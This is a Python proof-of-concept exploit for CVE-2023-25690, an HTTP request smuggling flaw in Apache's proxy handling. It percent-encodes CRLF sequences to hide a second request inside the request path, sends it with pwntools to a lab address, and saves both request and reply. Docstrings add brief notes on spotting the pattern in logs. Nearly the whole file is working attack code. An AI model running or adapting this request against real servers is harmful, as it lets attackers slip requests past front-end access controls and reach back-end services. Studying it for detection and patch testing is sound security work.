POC / CVE-2023-25690.py PY
from pwn import *


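def request_prepare():
    """Build the raw HTTP/1.1 request bytes used by this CVE-2023-25690 PoC.

    The contents of ``pre.txt`` are read as bytes and percent-encoded so they
    can sit inside a request target: space, CRLF, ``?`` and ``=`` are
    replaced, every other byte is passed through unchanged. The encoded blob
    is appended to a path that already carries an encoded request line and
    header block (``%20HTTP/1.1%0d%0aHost:...``).

    Defender notes: what this request looks like on the wire and in access
    logs is a request target containing ``%0d%0a`` together with an embedded
    ``HTTP/1.1``. Rejecting or alerting on encoded CR/LF in the path covers
    this request shape.
    NOTE(review): the proxy/rewrite configuration that makes a server
    affected is not shown in this file; confirm it against the vendor
    advisory for the CVE.

    Returns:
        bytes: the complete request, with the lab address 192.168.27.139 in
        the ``Host`` header.

    Raises:
        OSError: if ``pre.txt`` cannot be opened or read.
    """
    # Context manager so the handle is released even if read() fails; the
    # original left the file object open for the garbage collector.
    with open("pre.txt", "rb") as src:
        hexdata = src.read()

    # Same substitutions, same order as before. None of the replacement
    # strings contains a byte that a later rule would rewrite.
    for raw, encoded in (
        (b' ', b'%20'),
        (b'\r\n', b'%0d%0a'),
        (b'?', b'%3f'),
        (b'=', b'%3d'),
    ):
        hexdata = hexdata.replace(raw, encoded)

    uri = b'/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0aUser-Agent:%20Mozilla/5.0%20(' \
          b'Windows%20NT%2010.0;%20Win64;%20x64;%20rv:120.0)%20Gecko/20100101%20Firefox/120.0%0d%0a%0d%0a' + hexdata + \
          b'%0d%0a%0d%0aGET%20/abc'

    # Explicit \r\n terminators instead of a multi-line literal, so the line
    # endings are visible in the source.
    return b'GET %b HTTP/1.1\r\nHost: 192.168.27.139\r\n\r\n' % uri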


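def send_and_recive(req):
    """Send *req* to the lab host and return the first chunk of the reply.

    Opens a TCP connection to 192.168.27.139:80 through ``remote`` (brought
    in by ``from pwn import *``), writes the request bytes, performs one
    ``recv()``, prints the decoded data and returns it.

    Args:
        req: raw request bytes, sent exactly as given.

    Returns:
        str: the decoded bytes returned by the single ``recv()`` call. Later
        data on the same connection is not read, so the result shows only the
        start of the exchange; use the server-side logs to see how many
        requests the back end actually handled.

    Raises:
        UnicodeDecodeError: if the received bytes are not valid UTF-8.
    """
    ip = '192.168.27.139'
    port = 80
    p = remote(ip, int(port))
    try:
        p.send(req)
        # Decode once and reuse the text for both the print and the return.
        text = p.recv().decode()
        print(text)
    finally:
        # The original skipped close() whenever send/recv/decode raised,
        # leaving the connection open.
        p.close()
    return text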


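# Driver: build the request, then keep on disk exactly what was sent
# (req.txt) and what came back (res.txt). The two files can then be compared
# with the front-end access log and the back-end log, for example when
# checking that a patched or reconfigured server no longer forwards the
# decoded CR/LF.
req = request_prepare()
print(req)

# Context managers so both files are flushed and closed even if a write
# fails; the original relied on explicit close() calls that an exception
# would skip.
with open('req.txt', 'wb') as f:
    f.write(req)

res = send_and_recive(req)

with open('res.txt', 'wb') as f:
    f.write(res.encode())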